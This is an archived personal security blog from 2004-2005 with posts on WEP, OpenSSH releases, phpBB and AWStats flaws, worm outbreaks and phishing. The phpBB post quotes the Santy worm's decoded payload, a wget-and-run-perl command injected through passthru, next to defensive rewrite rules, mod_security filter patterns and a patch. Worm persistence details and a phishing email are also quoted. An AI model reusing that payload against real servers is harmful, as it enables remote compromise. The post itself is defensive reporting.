Wednesday, April 6, 2005

WEP is even easier to crack than we thought

A proof of concept demonstration by the FBI, using some tools available in the public domain, showed that it is possible to break the security that is provided by WEP in three minutes. Previously it took a while longer because so many packets had to be captured to run a full analysis on them. The new tools use statistical techniques that focus on semi random 24 bit (IV) numbers that are captured and then a dictionary attack completes the method used to obtain the key in such a short period of time.

Considering that a lot of wireless access points are not even using WEP, one one think that it's not too much of a problem as most are wise open anyway. Although totally true, it's just as bad having no security as thinking you are safe when really you're not. In fact, it could pose more of a problem when a false sense of security is in place. For example, if someone knew their network was wide open they would be less likely to store sensitive information. It's not always the case, but would be most of the time.

If they thought their network was secure and locked down, they'd impose less restrictions on storing sensitive information so have have a false sense of security is asking for trouble. Security through obscurity doesn't always work, but it can help. Although it should not be the only line of defence, in regards to wireless there are some easy things you can do.

Using certain tools, you can create thousands of fake access points, which protects your real one to a certain degree. Using this approach along with WPA instead of WEP greatly reduces the chances of your network being penetrated via a wireless access point. There are firmware upgrades for most wireless devices now which will allow you to use WPA instead of WEP. Of course, all of this does not apply if your access point is wise open and most are, a lot of them are not even rogue!

Post ID: 719, posted by jase at 01:58 PM
Permalink | Post / View Comments (0) | TrackBack ID: 692, (0) | Google Search

Friday, April 1, 2005

RFID chip on passports

I don't think the idea of putting RFID chips on passports is a good idea. Especially since they are not going to even contain any encryption. We all know the most systems are usually cracked in no time at all, so why increase the risk to pople having information stplen from them without them knowing, by wanting to use an up and coming technology for a purpose that it is not really designed for?

With changes made to the current plans, it could work. But there is no real need for RFID to be used. There are advantages, but I don't think they measure up when compared to the potential security risks associated with transmissing personal data via a wireless system that contains no real security.

There are plenty of other alternatives that could be used to increase productivity when checking passport or other identification without increasing the risk of this information being available to anyone with freely available equipment. There are enough cases of identity theft taking place, there's no reason to increase this number.

Visit RFID Kills to post your comments about the topic of including RFID chips in all new American passports. Of course, once one country does it the race will be on for all the sheep to follow, which in this case certainly wouldn't be a good thing unless security is improved. Also check out the comments on Slashdot.

Post ID: 713, posted by jase at 11:38 AM
Permalink | Post / View Comments (0) | TrackBack ID: 686, (3) | Google Search

Wednesday, March 9, 2005

OpenSSH 4.0 released

OpenSSH 4.0 and the portable version 4.0p1 have been released today.

Here are the changes since 3.9 as reported in the announcement email, I've just edited and formatted them as when copying from the email they don't display very well.

--

* ssh(1) now allows the optional specification of an address to bind to in port forwarding connections (local, remote and dynamic). Please refer to the documentation for the -L and -R options in the ssh(1) manual page and the LocalForward and RemoteForward options in the ssh_config(5) manpage. (Bugzilla #413)

* To control remote bindings while retaining backwards compatibility, sshd(8)'s GatewayPorts option has been extended. To allow client specified bind addresses for remote (-R) port forwardings, the server must be
configured with "GatewayPorts clientspecified".

* ssh(1) and ssh-keyscan(1) now support hashing of host names and addresses added to known_hosts files, controlled by the ssh(1) HashKnownHosts configuration directive. This option improves user privacy by hiding which hosts have been visited. At present this option is off by default, but may be turned on once it receives sufficient testing to confirm stability.

* Added options for managing keys in known_hosts files to ssh-keygen (1), including the ability to search for hosts by name, delete hosts by name and convert a known_hosts file over to one with hashed names. These are particularly useful for managing known_hosts files with hashed names that are stored in the file.

* Improve account and password expiry support in sshd(8). Ther server will now warn in advance,
for both account and password expiry.

* sshd(8) will now log the source of connections denied by AllowUsers, DenyUsers, AllowGroups and DenyGroups.
See Bugzilla #909.

* Added the AddressFamily option to sshd(8) to allow global control over IPv4/IPv6 usage. See Bugzilla #989.

* Improved sftp(1) client, including fixes for the ``ls'' command and command history and editing support using libedit.

* Improved the handling of bad data in authorized_keys files, eliminating fatal errors on corrupt or very large keys.
See Bugzilla #884.

* Improved connection multiplexing support in ssh(1). Several bugs have been fixed and a new "command mode" has been added to allow the control of a running multiplexing master connection, including checking that it is up,
determining its PID and asking it to exit.

* Have scp(1) and sftp(1) wait for the spawned ssh to exit before they exit themselves. This prevents ssh from being unable to restore terminal modes (not normally a problem on OpenBSD but common with OpenSSH portable on POSIX platforms).
See Bugzilla #950.

* Portable OpenSSH:

- Add *EXPERIMENTAL* BSM audit support for Solaris systems
See Bugzilla #125.

- Enable IPv6 on AIX where possible (see README.platform for details), working around a misfeature of AIX's getnameinfo.
See Bugzilla #835.

- Teach sshd(8) to write failed login records to btmp for unsuccessful login attempts. Currently this is only for password, keyboard-interactive and challenge/response authentication methods and only on Linux and HP-UX.

- sshd(8) now sends output from failing PAM session modules to the user before exiting,
similar to the way /etc/nologin is handled.

- Store credentials from gssapi-with-mic authentication early enough to be available to
PAM session modules when privsep=yes.

--

There are lots of changes and improvements so worth upgrading the current OpenSSH server running on your systems, if you use OpenSSH of course.

Post ID: 687, posted by jase at 04:01 PM
Permalink | Post / View Comments (0) | TrackBack ID: 660, (4) | Google Search

Tuesday, February 8, 2005

phpBB site compromised

Due to the recent issue identified with AWStats, the phpBB site has been defaced. They were using the update from web option, like all of the other systems that had AWStats with this option enabled. I can't see why people use this option anyway, since I use a cron entry to run mine automatically.

Unless you really need to give people access to your stats, then using a .htaccess file to block access to the public, even if you had the update from web option enabled nobody would have been able to exploit the vulnerability.

Luckily most of the people that had problems had backups of their data, but it has still cost them a lot of time. In light of the recent issues with phpBB and the worms that were developed to exploit bugs within it, combined with the fact the actual phpBB site was defaced via a security issue with AWStats that was three weeks old - it makes one ask the question, does the phpBB team need to get their act together with regards to security?

See the story on Netcraft.

Post ID: 658, posted by jase at 11:43 PM
Permalink | Post / View Comments (0) | TrackBack ID: 631, (0) | Google Search

Tuesday, February 1, 2005

AWstats vulnerability

A number of people, including Jeremy Zawodny and Russell Beattie have been hit by this security issue, which affects version 5.0-6.2. If you have the option AllowToUpdateStatsFromBrowser to 0 then you are not affected. To be honest, there is no reason to use that feature. I don't, my stats update runs hourly from cron which is the most logical thing to do, since then there is no intervention required to obtain the latest stats information, all you need to do is view the URL.

Unless you want to allow people to view your stats, using a .htaccess would be wise, it would have elimited this issue for Russell and Jeremy even with the update from browser option on. The need to know basis is part of the foundation of security, computer and otherwise, don't ive information to people that they don't require.

Thursday, January 6, 2005

Gmail delivery issues

If you have a Gmail account and your address has a special character that is used as part of your email address, you might find some of the mail that is being delivered to you is actually meant for another Gmail account that is the same as yours but without the special character, it has been reported.

An address of abc.def@gmail.com could receive mail that is meant for abcdef@gmail.com with no user intervention required. Google appears to have implemented a partial fix already, at least to stop new accounts being created with special characters. I'm unable to currently confirm if the real flaw has been addressed yet.

Thursday, December 30, 2004

TypeKey authentication enabled

I've now enabled TypeKey authentication as part of the Movable Type upgrade. Now, only TypeKey authenticated user comments will not be moderated and once I've sorted out MT Blacklist so that it works again since the upgrade, only comments that pass the blacklist rules will enter the moderation queue.

I've set things up so that anyone who is authenticated via TypeKey will be able to post freely as long as the blacklist rules are passed. These updates should see the end of any spam ever making it to the live pages, any that comes via TypeKey accounts can easily be removed and the account that is used can be banned.

Since upgrading, I noticed a few things were not working but I've sorted them out now, those issues were mainly interface related which were caused by me putting a few files in the wrong places when doing the upgrade, which I put down to the fact it was 6am and I needed to sleep.

Apart from the blacklist issues, everything appears to be fine. I've sorted some of the problems with it, but the remaining errors are not very informative about what is wrong, so I'll have to work on that.

Other than that, all that remains is to work on some other changes and additions which should come shortly, such as the odd few things that I want to add that have been appearing on other blogs as well as some other changes.

As the blog world moves forward and evolves we're finding more added to make them more viewable and fun, that is if you can use that word in relation to a blog.

Ben has also been busy working on his blog, cleaning up the spam and making the transition to WordPress, which should be noticed soon. Keep an eye on that as there should be some interesting things coming up, even though he's taken ages to get things sorted.

I've also added an Atom feed that you might want to use.

Tuesday, December 21, 2004

phpBB critical security issue

There is currently a worm spreading around the Internet that is searching for phpBB based message boards that are vulnerable. All previous versions are affected unless patched, except for the latest version which is 2. There may well be some manual exploitation taking place, but mainly this issue is being expolited by a worm called Santy.A , it's also known as a few other names.

I have heard of quite a few boards that have had content modified and because of the payload of this worm it has also been modifying html documents and images, to name a few. Exploiting the issue allows the worm to write a Perl script to a file on the server then run it, which allows the rest of the payload to be applied and also allows for the worm to start scanning for other vulnerable phpBB boards to compromise.

Aside from applying a patch orm upgrading, there are a few other things that can be done that some people have implemented, which could stop any attack by the worm before boards are updated which is handy if you run a server with a lot of sites running older versions of phpBB on it.

Creating a rewrite rule such as the following should help to provide a quick fix.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]

Or if you use mod_security in Apache you could use the following:

SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

Some work has already been done to decode the payload, which has been reported as:

rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'

Modifying the following code in the file viewtopic.php will resolve the issue, if you don't want to upgrade:

$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

for($i = 0; $i < sizeof($words); $i++)
{

Replace with:

$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

for($i = 0; $i < sizeof($words); $i++)
{

A lot of sites have already been defaced, another good reason to have a recent backup copy in addition to keeping updated on security issues and applying appropriate patches.

Thursday, October 21, 2004

Password or phrase?

Robert Hensing from the Microsoft PSS Security Team is trying to propose a new method of accessing systems. Although using a passphrase instead of a password is nothing new it is when we are talking about general access control systems. At present a user can authenticate using a username and password. In some cases, you'll need a token card as the system is using something like Secure ID but for the most part it's username and password authentication only.

Robert thinks along with others that it is time to change and improve upon the current system. Kind of like when the password file was readable by all users on a system - one day it was decided that this was a bad idea and about came the shadow system. Allowing users to use phrases instead of just a simple one word password would increase security and stop accounts being compromised so easily as users would not be able to use simple dictionary words and thus help to prevent dictionary based attacks.

Various people within Microsoft are looking at this phrase method of authentication, Jesper M. Johansson has written a document regarding it and outlines some of the reasons why this change should be made. There are some interesting points made. With the rise of worms that include password crackers and dictionaries the amount of automated cracking taking place is also increasing.

Insuring that AV software is constantly updated and rules are used to prevent certain words being used in passwords or the adoption of passphrase authentication, will help mitigate the effect that these worms have. The problem is, most people in the world who are not that computer literate have problems remembering passwords as it is. Although using tokens would be better there are increased costs and some companies cannot afford to pay. Combined with the fact most people would have problems using tokens, the passphrase approach would increase authentication security and not have the cost / complexity issues.

If more companies were aware of the need for better security, the people who have the authority to spend money might do. At the moment, a lot of companies are not aware. With the introduction of phrase authentication instead of passwords in Windows, it would allow for some degree of increased security without any extra money being spent.

Users would rather not have to type longer passwords or phrases, but if they are forced to then of course they will. So it is the job of the security team and administrators of a network to ensure that a decent policy is used. Windows has supported longed passwords since Windows 2000 so using a phrase is not a problem.

I have already thought about this, but reading these articles also reminds me that it is not down to the complexity of a password or phrase that makes it more secure. It is down to the length. Using a shorter password should cause a need for it to be more secure but using a longer phrase of text increase the complexity itself as the longer a password or phrase is the more possible combinations there could be which of course increases the time required to crack.

Using a long phrase, for example around 40 characters would take a long amount of time to crack. It simply would not be worth it and by the time an attack may have hit the jackpot, the password change policy would have ensured that the password has already been changed so the attacker would be back to square one.

For those of us that can type really faster, using a phrase would not be too much of an issue. For people that only type slowly, they would have to spend a little more time logging in. I'm sure that most administrators that have half a clue about security would assume this side effect for some people to be acceptable when judging it against the increased security provided.

It's not only Microsoft products that should adopt this approach. It would allow for even more security on other operating systems. In the same way, if the password file was obtained, it would not be feasible to try and crack the passwords if a good change / complixity policy was used. Maybe Microsoft should ensure that a longer policy is enabled by default to help the use of longer phrases spread.

Policies have been available on various systems for a long time but they have not been used very often or only in limited form, such as you are not allowed to use a previous password again. The complexity rules are not used as much on Windows systems and most UNIX based systems I've used don't implement any complexity requirements at all or you get warned about complexity but can ignore it and use the password you want anyway.

This could be the start of a change like we saw when people stopped using authentication systems that involved clear text. Soon we could have the same thought abouts using passwords as they are as we now do of plain text authentication.

Post ID: 542, posted by jase at 07:46 PM
Permalink | Post / View Comments (0) | TrackBack ID: 515, (9) | Google Search

Tuesday, September 28, 2004

The OpenSSH project turns five

Here is the announcement:

--

Five years ago, in late September 1999, the OpenSSH project was started.

It began with an audit, cleanup and update of the last free version of Tatu Ylonen's legacy ssh-1.2.12 code. The project quickly gathered pace, attracting a portability effort and, in early 2000, an independent implementation of version 2 of the SSH protocol. Since then, OpenSSH has led in the implementation of proactive security techniques such as privilege separation & auto re-execution.

The free software community were rapid adopters of OpenSSH, with most free operating systems shipping OpenSSH within its first year of existence. Over the last five years OpenSSH has become the most widely used SSH protocol implementation (by a large margin) and has been included in products from major vendors including IBM, Apple, HP, Sun, Cisco and NetScreen. Today, OpenSSH runs on everything from mobile phones to Cray supercomputers.

In providing a free, popular and easy to use secure login and command execution protocol OpenSSH has been instrumental in speeding the deprecation of insecure protocols like telnet and rlogin.

The OpenSSH team would like to thank all those who have supported the project over the last five years, including individuals and vendors who have donated funds or hardware. An extra special thanks to those who have reported bugs or sent patches to the project.

OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de Raadt,
Kevin Steves, Damien Miller, Ben Lindstrom, Darren Tucker and Tim Rice.

--

Five years already? That was a bit of a shock. It just goes to show how quickly time goes. I've been using OpenSSH since the start, firstly with OpenBSD and then moving over to using it on Linux. A lot has been done with it, hopefully there is more to come. Well done to all those concerned.

Post ID: 519, posted by jase at 11:29 PM
Permalink | Post / View Comments (0) | TrackBack ID: 492, (0) | Google Search

Friday, July 30, 2004

DEFCON 12

Today is the start of DEFCON 12 in Las Vegas. I've been saying I will go every year since 1998 and have still not got around to it due to other trips away and such. Next year I'm going to try and make it, the problem is that there are a lot of things on my schedule that I want to do most years and some collide so decisions have to be made.

I'm off to Godskitchen Global Gathering tomorrow, so that is something I would have missed, but would not have minded since I would have been in Las Vegas instead.

DEFCON 13 is already down on the list next year, just need to wait for the date to be confirmed!

Post ID: 458, posted by jase at 02:33 PM
Permalink | Post / View Comments (0) | TrackBack ID: 431, (8) | Google Search

Monday, July 26, 2004

MyDoom.M

So the latest on the block is MyDoom.M and it seems that this worm is very fast to spread. I've already received a few messages to my work account. Now as we run Solaris, there is no real effect apart from extra load on the mail servers. Some of the aliases that are global that the worm has been sending itself to, have been gathered from infected machines that do run MS OS's, such as laptops so the worm is able to spread itself out to these addresses from the inside of the SWAN (Sun Wide Area Network) when they are connected internally or via VPN.

Even when you have a network with virtually no infected systems connected, all it takes is one machine to still cause issues. Most global aliases have no need to except external mail so that cuts it down, but when you have infected systems that connect, issues still arise, in this case mostly just increased mail activity but for other networks, worm such as this will have much more of an effect as probably all machines just about, are Windows based. The from field of the email received is spoofed and when infected a backdoor is installed which is known as Backdoor.Zincite.A, on port 1034/tcp.

The following registry keys are created:

* HKEY_LOCAL_MACHINE\Software\Daemon
* HKEY_CURRENT_USER\Software\Daemon

And it copies itself to the system as:

* %Windir%\java.exe
* %Windir%\services.exe


The following values are added to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

"Services" = "%Windir%\services.exe"
"JavaVM" = "%Windir%\java.exe"

So the worm is loaded when Windows boots. It is being reported that this is classed as quite severe due to the rate at which it appears to be spreading. For a full analysis go here. You would be advised to update your AV software.

Post ID: 454, posted by jase at 12:38 PM
Permalink | Post / View Comments (0) | TrackBack ID: 427, (9) | Google Search

Monday, July 19, 2004

Duts.1520

Word on the street is that Ratter, a member of the 29A virus development group has released a proof of concept virus, designed for the PocketPC. It was only recently that 29A released code which targets mobile phone running the Symbian OS.

There is no destructive payload and the user is asked if the virus is allowed to spread, which is partly due to this being POC code. Of course, there may now be a stream of future virii destined for Symbian devices and also PocketPC systems.

It just goes to show, it is only a matter of time before someone decides to do something and completes the task. Read an analysis of Duts, here.

Monday, July 5, 2004

Beagle.Y & Beagle.Z

Another two variants have been released, Beagle.Y & Beagle.Z. One of these worms includes the source code which will probably allow for a number of new variants to be released at an even higher rate than we have previously seen. One thing though, what will happen to the naming scheme now we have made it to the end of the alphabet?

An interesting thing to note is that both of these worms can cause versions of W32.Netsky from running, which is obviously part of the game various programmers of these worms are playing.

Post ID: 433, posted by jase at 09:02 PM
Permalink | Post / View Comments (0) | TrackBack ID: 406, (0) | Google Search

Saturday, June 26, 2004

Download.Ject - Safe to browse?

Well lets face it, the majority of servers on the Internet are powered by a non Microsoft OS, but the majority of users browsing the Internet are using Internet Explorer. The reports of some high traffic sites being hacked and distributing malicious code to visitors is probably going to infect most of the users running IE, but applying the patches from Microsoft and keeping your AV software updated should help reduce any risk of infection.

Since there are a lot less sites powered by IIS, compared to Apache the issue is not as bad as it could be, but all it takes is a few servers running IIS and distributing this code to infect all the visitors running IE.

I'm sure the various AV vendors will have updated their signatures now, but it might also be a good idea to use an alternative browser rather than IE. I can't help thinking if we went back to the core of the system - the design - we'd not have these problems.

As most would agree, to stop the constant supply of issues relating to MS products, the entire OS would have to be re-built, with more limits in place with regards to access and such so that exploiting these types of vulnerabilities does not allow for complete access to a system.

A system is only as secure as its weakest point and the weak point in this equation is Windows.

Monday, June 21, 2004

Port blocking at ISP level

NTL recently announced that they will be blokcing inbound traffic to certain ports on their network, which are used by some of the recent worms. The blocking will not affect most users, but it may cause problems for certain users who use the services which also use some of those ports, such as Windows file & print sharing.

The ports being blocked at present are:

* 137 (UDP)
* 138 (UDP)
* 139 (TCP)
* 445 (UDP & TCP)
* 593 (TCP)
* 1433 (TCP)
* 1434 (UDP)
* 27374 (TCP)

It seems like a good move, I'm just wondering when other ISP's who are providing Internet connectivity to the majority of people (who don't know how to keep their Windows computer secure) will do the same - these same users are the ones who think that they know about computers when the reality of it is they don't even know Windows products really, let alone *NIX or anything else.

Windows needs AV protection built in and on by default - forget the anti-trust issues, include some AV.

Tuesday, June 15, 2004

First Bluetooth based worm

The group 29a have developed a worm which spreads via Bluetooth and infects mobile phones running the Symbian operating system. Although it does not have a dangerous payload, it is proof of concept code which is something that the 29a group tends to release a lot of.

This worm, called Cabir won't damage your handset - but future variants or other code maty well do. Just think how annoying it would be if you ran something that than wiped your handset or memory card, on the Nokia 6600 for example.

You are given a message asking if you want to run an installer, so this combined with the fact you would be receiving the "application" from an unknown source might stop some people from running it or a variant. Although from what we have seen with other things in the past, there will still be a large number of people that would accept the file and run it.

All very interesting, most POC projects usually are!

Sunday, June 6, 2004

Plexus-A

A new worm is circulating which is spreading via multiple means. It uses exploit methods recently seen in other worms, such as Blaster & Sasser.

Plexus copies itself to the system as upu.exe. It then registers this file in the system registry under:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvClipRsv"=[path to the executable file]

Plexus opens port 1250, so it would be worth blocking this port at the firewall.

For a full analysis, go here.

Now, I'm thinking that if MS did more to include protection in Widows by default a lot of these problems could be reduced. For example, if there was an AV scanner included with Windows, at least all systems would have it and then users would not need to do anything. Most systems don't have any AV software and this is partly where the problem lies.

It would not solve the problem totally, but it sure would cut the amount of systems getting infected to a much lower number and at least notify users that something might be up.

Along the lines of OpenBSD as being secure by default. Microsoft could adopt the slogan of "AV protected by default".

I'm sure one of the AV vendors out there would like to have their application included by default and get a load of money from MS or Microsoft could just buy the company out, but then we would hear more about world domination and how it is unfair to make such a move, just like we have seen in the past regarding Internet Explorer being bundled with Windows.

Something needs to be done. If most users were not so stupid, things would also improve.

Post ID: 401, posted by jase at 11:40 PM
Permalink | Post / View Comments (2) | TrackBack ID: 374, (0) | Google Search

Friday, June 4, 2004

Covert training is needed

You would think that if someone you know wanted to be silly and posy dumb comments on your blog, they would at least attempt to hide the fact it is them.

I've just noticed another stupid comment which has wasted my time (all 5 seconds of it) to delete. It's not the first time, but since it has just been posted and I know the hostname, who is in the office right now, who knows about my blog and who has posted before - I have a good idea of who it is.

I'm not annoyed - I just think it is stupid.
I'd block this site from even being viewed by work addresses, but that ruins it for everyone, so does blocking posting from those addresses.

Sounds like you need me to give you some tips in the art of hiding in the shadows as you were busted before, but I just didn't bother discussing it.

UPDATE: 04/06/04

Since reserved address space is now being used to post, I know exactly who could make that work, which means even if that knowledge was passed on, I know where it originated.

1 point for having a single skill. 2 points for making me laugh at the personal comments, 3 points for being lame. It's funny that person wouldn't say anything to my face but instead has to resort to electronic foul mouthing.

Lamers never admit it, let me see if I am wrong in this case.

Post ID: 399, posted by jase at 03:05 AM
Permalink | Post / View Comments (6) | TrackBack ID: 372, (0) | Google Search

Saturday, May 29, 2004

First 64 bit Windows virus

It seems that the first virus which can infect 64 bit Windows systems has been spotted in the wild. The code, which is proof of concept uses the Thread Local Storage structures to execute the viral code.

The virus is written in IA64 assembly language, it will not run on 32 bit systems but will run on 32 bit systems running 64 bit emulation.

It uses a small number of Win64 API's from the following libraries:

NTDLL.DLL
SFC_OS.DLL
KERNEL32

From NTDLL.DLL, it uses these functions:

LdrGetDllHandle()
RtlAddVectoredExceptionHandler()
RtlRemoveVectoredExceptionHandler()

To aviod crashing during infection, vectored exception handling is used.

The SfcIsFileProtected() function of SFC_OS.DLL is used to avoid infecting executables that are protected by the System File Checker (SFC).

The following 16 functions are used from KERNEL32.DLL to implement a standard file infection of a IA64 portable executable image:

CreateFileMappingA()
CreateFileW()
CloseHandle()
FindFirstFileW()
FindNextFileW
FindClose()
GetFullPathNameW()
GetTickCount()
GlobalAlloc()
GlobalFree()
LoadLibraryA()
MapViewOfFile()
SetCurrentDirectoryW()
SetFileAttributesW()
SetFileTime()
UnmapViewOfFile()

For the full details, see the Symantec bulletin.

Post ID: 393, posted by jase at 12:27 AM
Permalink | Post / View Comments (0) | TrackBack ID: 366, (0) | Google Search

Tuesday, May 25, 2004

Microsoft site defaced

Obviously MS has not been keeping the patches applied on its own web servers or at least there is a new vulnerability that has been exploited. The main MS site has been defaced slightly, not on the front pages, but a more subtle modification to hopefully go unoticed for longer.

More details are yet to follow, but indeed it is another blow for MS, with regards to security and the fact that even their own site can be hacked, which is not something new as it has happened before.

When will they learn?

Post ID: 388, posted by jase at 09:53 PM
Permalink | Post / View Comments (0) | TrackBack ID: 361, (6) | Google Search

Wednesday, May 19, 2004

CVS & Subversion bugs

The flaw realting to CVS, affects all versions of the software released before May 19 2004.
The heap overflow issue occurs because data from the users is not checked enough. The CVS Project and various vendors have already posted advisories and patches.

The Subversion issue is much easier to exploit, it is caused by an error in the way the code parses dates, which could allow remote code execution.

If you use CVS or Subversion, update or patch!

Post ID: 382, posted by jase at 03:52 PM
Permalink | Post / View Comments (0) | TrackBack ID: 355, (0) | Google Search

Friday, May 14, 2004

Dabber

A new worm called Dabber appears to be spreading via a vulnerability in the recent Sasser worm. Dabber is different, in that it is one of the fist to spead by exploiting an actual programming error in Sasser.

Dabber scans for infected Sasser hosts, on port 5554. If it finds an infected system it then uses code from a Sasser FTP exploit to take control of the box.

After Dabber has installed itself it then deletes the registry keys of Sasser and other worms / viruses. Dabber opens up port 9898 as a backdoor. To remove dabber, you would need to kill the "package.exe" process & then delete the file as well as removing the "sassfix" registry key.

It can be found in the following locations:

%System%\package.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe

%Windir%\All Users\Main menu\Programs\StartUp\package.exe

It appears to delete a list of entries from other registry keys, check out the Symantec Alert for full details. It looks like this might be another trend that appears, as obviously even malicious code has bugs.

Post ID: 377, posted by jase at 04:22 PM
Permalink | Post / View Comments (0) | TrackBack ID: 350, (0) | Google Search

Tuesday, April 27, 2004

Infosec visit

I headed down to London last night to attend Infosec today. I've finally made it, after saying I'll go every year for about the past 4 or 5 years. It was as expected, companies showing off their products and such. I did manage to make it to one of the seminars, a MS one, which was quite good.

The thing that made me laugh was, whilst visiting the Juniper Networks / Netscreen stand, whilst having a play around with some software on one of the demo systems, there was a Putty terminal open, which I maximized to find there sitting in front of me, a root shell. The IP address was a reserved one, in the 10 range, so I'd assume that this box was part of the stuff on the stand.

I could have caused them some problems & or had some fun, but I didn't bother. I thought, that's too easy. Although I didn't report it to them, so someone else might have had some fun instead. It's not something you would like to see, even if only in this type of environment - It gives off the wrong impression to potential and existing customers regarding Juniper's stance on security. Even more so since this is a security related conference.

Post ID: 358, posted by jase at 11:10 PM
Permalink | Post / View Comments (0) | TrackBack ID: 332, (3) | Google Search

Thursday, April 15, 2004

Loads of vulnerabilities

As we have all seen over the past few days, Micrsoft have released a host of security patches to fix no fewer than 20 security issues recently discovered in a selection of their software products.

Everything from Windows 2000, XP, Windows Server 2003, Outlook & Internet Explorer are affected in one way or anthother. 8 of the security issues are classed as critical and users are advised to update as soon as possible via Windows Update.

There have been some performance issues with Windows Update since the monthly update as so many users were trying to update.

Check out a full low down on the bugs here & here.

But more importantly, patch.

Post ID: 345, posted by jase at 09:31 AM
Permalink | Post / View Comments (0) | TrackBack ID: 319, (1) | Google Search

Wednesday, April 14, 2004

Who would fall for this?

Ok, so we've all probably heard about the phishing going on at the moment, spam mails reported as being from banks.

If you fall for this one - you are proven to be stupid!

Well, it's obvious when you're not a customer of the bank that the mail must be fake, but some of them that are going around, that I have received - do look pretty good and can fool people. I get ones from Barclays quite a bit. I'm a Barclays account holder but I obvoiusly know it's all fake.

This is the latest I've received - what a joke!
Surely, nobody would fall for this one?
The sad thing is, I bet I am wrong.

Some people think it must be from the bank, nobody else is going to know you are a customer of the bank. Well, you would be right they don't - but these mails are sent out on a mass basis and out of say 10,000 a percentage of those receiving the mail will be a online banking customer of the bank in question.

---
Hello dear client Barclays Bank.
Today our system of safety at night has been cracked!!!
It not a joke!!! It is the truth!!!
We ask you, in order to prevent problems, to repeat
registration of your data. Make it very quickly!
Administration Barclays Bank.

http://ibank.barclays.co.uk
---

Obviously it's a specially crafted link that sends you to another site even though the URL can show up as being correct for the bank in Outlook. Some of these issues are due to bugs in Outlook/Express and IE - patches are available but the majority of people (read: average computer user) won't have updated.

Post ID: 344, posted by jase at 10:43 AM
Permalink | Post / View Comments (0) | TrackBack ID: 318, (6) | Google Search

Tuesday, April 13, 2004

New Apache vulnerabilities

There are a few new bugs reported & users of affected versions would be advised to upgrade.

One is a DOS, which affects Apache 2, the issue has been fixed in release 2.0.49.

The other issue, is not remote like the one above but local only - it affects 1.3.x and 2.x. Although, 1.3.29 is said to not be affected. Most vendors have released patches already, but you could just download the latest versions of Apache instead.

Availability of exploits is currently unknown to me, but it's good practice to upgrade anyway.

Post ID: 342, posted by jase at 11:06 PM
Permalink | Post / View Comments (0) | TrackBack ID: 316, (5) | Google Search

Tuesday, March 23, 2004

Possible Gnome.org server compromise

The Gnome project has announced that the main server hosting the project, may have been compromised. Nothing has been confirmed yet, as investigations are taking place.

Of course all downloaded code can be verified by MD5 checksum, but we'll have to wait for the reports.

See the announcement.

Wednesday, February 25, 2004

OpenSSH 3.8 released

OpenSSH version 3.8 has been released which contains various bug fixes and also a number of new features, which include:

* Supports sending application layer keep-alive messages to the server.
* Forced changes of expired passwords via passwd.
* Uses untrusted cookies for X11 forwarding.
* Improved sftp batch file support.
* Support for host keys in DNS.
* GSSAPI support replaced with "gssapi-with-mic" to eliminate attacks.

As well as more bug fixes and memory leak fixes. Although not mandatory, if you can see the new features being of use and you have the desire then go ahead and upgrade.

Post ID: 286, posted by jase at 11:25 PM
Permalink | Post / View Comments (0) | TrackBack ID: 261, (0) | Google Search

More secure with XP SP2

Bill Gates has outlined various improvements that will be made to systems when users update to service pack 2 after its release. Changes such as switching on the firewall will be welcomed, as the amount of people who don't have much of a clue about computers that leave their systems unpatched sitting online launching DDOS attacks and various other things will be reduced.

Since if the firewall is enabled then the worms and trojans won't be able to connect in the first place - or at least, if most users of XP upgrade to service pack 2 future attacks that exploit vulnerabilities in services such as Blaster, will not be able to spread at such at rate.

I would think that Microsoft would have included some AV and firewall technology in Windows a long time ago - the firewall is the to be used, but not enabled by default, why? Something that allows automatic updates to rules and definitions, such as with Symantec products for example, would have proven effective against some of the backdoors and such like that we have seen in recent times.

It can only be a good thing that MS are addopting this approach now, even though a bit late - it will be an improvement. On the other hand, I think the monthly updates are a bit stupid, especially if critical updates to patch vulnerabilities are also only published as part of the monthly updates. One would expect that critical patches would be made available as soon as possible, but other things that did not have such an impact could be worked on over a longer period of time.

Given that some vendors release patches straight away and work on fixing bugs as soon as they are notified, it only seems fair that a company the size of MS should invest more time & money to ensure that security is at the top of the priority list. It could only be Microsoft that has been notified about various bugs in applications such as Internet Explorer and Windows, yet has failed to release fixes a long time after they were notified.

If the general computing world decided not to accept the current state of affairs, I'm sure that more effort would be made. Things will have to change and it seems they are beginning to.

Post ID: 285, posted by jase at 03:39 AM
Permalink | Post / View Comments (0) | TrackBack ID: 260, (0) | Google Search

Tuesday, February 17, 2004

RC5-72 distributed.net project

I'm sure you are all aware of the challenges that RSA security set to crack encrypted messages which allows us to understand how secure a specific algorythm is. Distributed.NET works on these projects via means of distributed computing and brute force.

I've worked on previous projects in the past such as RC5-64, back in 1998 and I continued to work on it until completion. I had the advantage of having a lot of machines at college working on the project for me and at the peak I usually had around 5-10,000 blocks a day being submitted for me which all went to the team I was part of (alt.ph.uk). Looking at the stats, I can see that in total I submitted 832,603 blocks, not bad at all.

I've recently started working on RC5-72 now, but this time I have the advantage of using 2 Sun Fire V880's, that both have 8 UltraSPARC-III processors & 32GB of RAM as well as a few other machines P4/Athlon XP based.

distributed.net client for Solaris Copyright 1997-2003, distributed.net
RC5-72 SPARC assembly by Didier Levet and Andreas Beckmann
Please visit http://www.distributed.net/ for up-to-date contest information.

dnetc v2.9005-484-CTR-03042808 for Solaris.
Please provide the *entire* version descriptor when submitting bug reports.
The distributed.net bug report pages are at http://www.distributed.net/bugs/

